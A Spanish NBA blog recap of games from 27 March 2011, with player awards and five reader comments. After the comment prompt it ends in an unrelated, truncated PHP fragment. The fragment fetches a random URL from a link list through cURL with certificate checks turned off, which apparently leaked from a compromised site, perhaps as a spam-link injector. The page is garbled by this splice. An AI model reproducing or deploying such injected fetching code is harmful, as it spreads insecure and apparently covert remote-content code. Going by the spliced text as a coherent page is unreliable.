La Crónica (27/03/2011)

28 de March de 2011 por TheDeerHunter

Tercera derrota consecutiva de San Antonio, en esta ocasión frente a Memphis (104-111). Más que la derrota, lo que provocó verdaderamente que Popovic perdiera los papeles fue el susto que le dio Ginobili en un golpe con Marc Gasol. El técnico acabó expulsado con 2 técnicas consecutivas al considerar que había habido falta del jugador español, y Manu lesionado, por suerte, no de manera grave. En el plano deportivo gran actuación de Tony Allen, Zach Randolph y también de OJ Mayo. Y más allá de los números, determinante Marc en su primer duelo NBA contra Splitter. Los ositos dan un paso de gigante.

Todos los perseguidores del Oeste cumplieron con sus compromisos. Los Lakers abusaron de un Hornets demasiado mermados (84-102). Jason Kidd ajustició a sus ex, Suns, con una explosión final desde el triple tras un precioso duelo Chandler vs Gortat (91-83). Y los Thunder, por su parte, certificaron su clasificación para postemporada neutralizando el partidazo de Gerald Wallace (90-99).

En el Este, los Celtics sufrieron más de lo previsto contra Minnesotta (85-82). Delonte fue titular ante la baja de Rondo pero se confirma que Shaq volverá la primera semana de Abril. Beasley les hizo un roto pero en defensa el chaval no se aplica mucho y Pierce pudo salvar a su equipo de la debacle. Los Heat no fallaron y alejan aún más a Houston de playoffs (119-125). 30-10 por cabeza de su Big Three que anuló el inmenso partido del de Houston, Lowry-Martin-Scola. Atlanta no falló en Cleveland (99-83) y la única sorpresa la dio, como alguno de nuestros visitantes avanzaba anoche, los Kings en Philadelphia a pesar de ceder la prórroga (114-111). El banquillo de los Sixers estuvo desastroso.

Para terminar los Warriors ganaron a Washington en un partido intrascendente (104-114).

PREMIOS

MVP: Los Warriors ya no pueden clasificarse para los Playoffs pero parece que nadie se lo ha dicho a Monta Ellis. Y es que el escolta de GS ha encadenado dos partidos sublimes. Anoche fueron 37 puntos, 13 asistencias y 7 rebotes. De todas maneras hoy es obligatorio destacar al Big Three de Miami. Bosh, Lebron y Wade se han combinado para anotar 94 puntos, capturar 33 rebotes y repartir 15 asistencias. Hay equipos al completo que no llegan a estas cifras.

Rookie: John Wall consiguió un nuevo doble-doble al anotar 18 puntos y repartió 12 asistencias. Lo malo es que lo consiguió con tan solo un 31% de acierto en el tiro.

Sorpresa: La baja de Kevin Love ha dado minutos a Anthony Tolliver y el ex de los Warriors está respondiendo con buenos partidos. Anoche se fue a los 16 puntos, 15 rebotes y 4 asistencias.

Decepción: Louis Williams y Thaddeus Young sólo fueron capaces de anotar 3 de los 23 lanzamientos que intentaron. Y eso que en teoría son los mejores jugadores del banco “sixer”.

Esfuerzo en vano: Hace pocos discutíamos si Javale McGee podía llegar a convertirse en un jugador de 16-10-3. Anoche superó con facilidad estos números al anotar 28 puntos, coger 18 rebotes y poner 5 tapones. Seguro que él votaría por jugar siempre contra GS, aunque perdiera.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Que vayan con mucho ojo los Spurs, que sólo les queda un partido teóricamente fácil (Kings) pero el resto son complicados, incluyendo la visita a los Lakers.

      Citar

  2. PIRATA dice:
    #2

    Creo que los tres próximos partidos de SAS van a marcar si el próximo 12 de abril habrá partidazo en el Staples…

      Citar

  3. Len Bias dice:
    #3

    Parece que sea el que sea quien juegue de 4 en Minnesota se harta a coger rebotes. Love lo hacía, Randolph lo empezó a hacer y ayer que Randolph se cargó de faltas, jugó Tolliver y también lo hizo. Debe de estar planificado, por eso Love se hinchaba siempre.

    Increíble los números del Big Three de Miami, espero que no espabilen porque me cae mejor Chicago y los quiero en la final.

    Partidazo de Tony Allen

      Citar

  4. MagicJohnson32 dice:
    #4

    Lo del 4 de los Wolves es como lo de Humphries en los Nets: alguien tiene que coger los rebotes ¿no?

      Citar

  5. Denise dice:
    #5

    Muy preocupante para los Celtics que tengan que sufrir hasta el último segundo para derrotar a un equipucho, que, sin Kevin Love es más equipucho aún más. Que los Wolves, sin el mencionado Love, te cojan 7 rebotes más, es sintoma de que algo falla en la pintura.
    Que McGee con lo tronco que es haga un 28-18-5 es lo que hace que piense que cuando mejore sus movimientos ofensivos, va s ser una autentica bestia y un pedazo de crack.
    Espero que no le pase lo mismo que a Okafor, que parecía que podía estar a la altura de Howard, y al final se ha quedado en un pivot normalito, que aporta demasiado poco para el fisico que tiene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>